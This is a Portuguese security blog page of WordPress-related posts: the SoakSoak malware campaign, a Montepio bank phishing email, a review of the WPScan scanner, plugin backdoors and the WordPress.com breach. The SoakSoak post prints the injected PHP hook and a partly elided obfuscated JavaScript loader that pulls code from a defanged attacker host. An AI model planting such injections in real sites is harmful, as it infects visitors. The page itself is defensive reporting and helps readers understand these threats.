Todos os posts tagados wordpress

Mais de 100000 sites WordPress infetados

SoakSoak-RU-Blacklisted

O Google bloqueou ontem cerca de 11.000 domínios com a última campanha de malware SoakSoak.
A empresa Sucuri suspeita que os valores sejam bem superiores e que estão relacionados com a vulnerabilidade no plugin para WordPress Revslider.

O SoakSoak modifica o seguinte ficheiro do WordPress wp-includes/template-loader.php e inclui o seguinte código:

function FuncQueueObject()
{
  wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

Isto faz com que o swobject.js seja executado em todas as páginas do blog que inclui o seguinte malware:

eval(decodeURIComponent
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

Este código JavaScript ofuscado, carrega o ficheiro malicioso hxxp://soaksoak.ru/xteas/code

Contatei algumas empresas de alojamento em Portugal, que mencionaram a presença deste malware em algumas das suas contas de clientes mas que a situação encontra-se controlada.

Phishing Montepio

Phishing Montepio

Tenho recebido notificações que circula pela web um novo email de phishing. Esta nova campanha maliciosa tem como alvo clientes do banco Montepio.

Remetente: MontepioGeral@s5.newseoul.com
Assunto: Aviso Importante

O email e estilo de ataque é muito semelhante ao já publicado aqui relativo à Caixa Geral de Depósitoshttp://www.websegura.net/2013/05/phishing-prezado-cliente-caixa-geral-de-depositos/.

O email fraudulento alerta o utilizador que existe uma atualização no cadastro do cartão matriz e deverá clicar num botão para corrigir essa situação. A imagem apresentada no email está com um link para um blogue WordPress de origem chinesa que poderá ter sido comprometido (algum plugin desatualizado ou algo semelhante).

Nessa página foi efetuada uma cópia do site original do montepio.pt para que desta forma os utilizadores fossem enganados a colocar os dados confidenciais.

Esta página de phishing não contém, até à data deste artigo, malware (resultado do VirusTotal), no entanto convém referir que os utilizadores maliciosos responsáveis desta página, realizaram código especifico para diversas versões de browser, programaram um keylogger no cartão matriz e tudo com mensagens em português (no novo acordo ortográfico).

Como evitar este tipo de ataques:

  • Verificar sempre o endereço da barra de navegação do browser
  • As páginas das entidades bancárias tem sempre um certificado de segurança (o endereço começa por https)
  • As entidades bancárias nunca lhe vão solicitar informação por email
  • Fazer pesquisas nos motores de busca sobre o email

Análise ao WPScan – WordPress Security Scanner

Esta semana testei a ferramenta WPScan do ethicalhack3r e surpreendeu-me pela positiva.
Programado em Ruby, o WPScan pode ser bastante útil a admins de blogues WordPress ou pentesters que queiram avaliar, de certa forma, a segurança do sistema de blogues mais popular da actualidade.

Esta ferramenta utiliza uma aproximação blackbox, ou seja, analisa sem qualquer conhecimento prévio o que está instalado no blogue WordPress.

Entre as principais características saliento:

  • Enumeração de nomes de utilizador (querystring do autor e do cabeçalho location)
  • Ataques força bruta ao painel de login (multithread)
  • Enumeração de vulnerabilidades (baseada na versão)
  • Enumeração de plugins (os 2220 plugins mais populares)
  • Outras verificações (nome do template, listagem de directórios, etc)

Testei no Mac OS X e no Ubuntu e a única coisa que tive de instalar foram as dependências (typhoeus e xml-simple):

sudo gem install –user-install typhoeus
sudo gem install –user-install xml-simple

Presumo que também deverá correr no sistema operativo Windows, desde que seja preenchido todos os requisitos.

Nos testes que realizei, ficando apenas de parte a força bruta, fiquei satisfeito com o resultado do WPScan que basicamente obtem a maioria das informações via código fonte da página (tal como o ScanPW).

(Teste que demonstra o nome do template utilizada no WordPress)

(Teste que demonstra a versão do WordPress, neste caso desactualizada, e a presença do ficheiro readme.html)

(Teste que demonstra possíveis vulnerabilidades)

Ainda numa versão alpha, é sem dúvida uma ferramenta a seguir e ter em conta.

Download:

svn checkout http://wpscan.googlecode.com/svn/trunk/ wpscan-read-only

WordPress alerta para alguns plugins com ‘backdoor’

No site oficial do WordPress, li que alguns backdoors foram encontrados em plugins bastante utilizados, entre eles:

  • AddThis
  • WPtouch
  • W3 Total Cache

É aconselhável verificar os plugins e verificar se está tudo correcto.

WordPress.com comprometido

No IDG Now!:

Segundo a Automattic, invasor obteve trechos do código-fonte da plataforma de blog.

Hackers tornaram vulneráveis diversos servidores que dão apoio ao WordPress e podem ter obtido código-fonte, de acordo com o fundador da Automattic, empresa por trás da popular plataforma de blogs.

Matt Mullenweg escreveu no blog do WordPress que a Automattic tem revirado os registros de logs para estimar quanta informação foi exposta e reavaliar as “avenidas de acesso” aos dados.

“Nós pressupomos que nosso código-fonte foi encontrado e copiado”, escreveu Mullenweg. “Boa parte é open source, mas há partes protegidas, nossas e de nossos parceiros. Fora isso, contudo, parece que a informação acessada foi limitada.”

Mullenweg escreveu que a empresa não tem conselhos específicos para os usuários do WordPress além de usar senhas fortes e não usar a mesma senha para vários sites.

Na seção de comentários do blog, um usuário perguntou se o WordPress armazena as senhas em texto puro ou usa técnica de hash. Mullenweg respondeu que o WordPress usa o arcabouço de hashing de senhas Portable PHP.

“Nossa investigação neste assunto está em andamento e levará tempo para ser finalizada”, escreveu. “Como disse acima, temos tomado medidas abrangentes para prevenir que um incidente como este ocorra novamente.”

A invasão ocorre em sequência do que a Automattic descreveu como o pior ataque de negação de serviço de sua história, no mês passado. Este ataque, no entanto, foi  frustrado logo depois de ter sido iniciado.

O Miguel Almeida recomenda no seu blogue o seguinte:

Entretanto, se tiverem contas no WordPress.com, mudem as passwords. Aliás, mudem as passes do WordPress.com, e, se tiverem ligações entre o WP e outros serviços (e.g. Twitter ou Facebook), mudem-nas também. (Se, por acaso, a vossa password do WordPress até é igual às passwords de outros serviços, bem, já sabem o que têm que fazer, certo? Mudá-las.)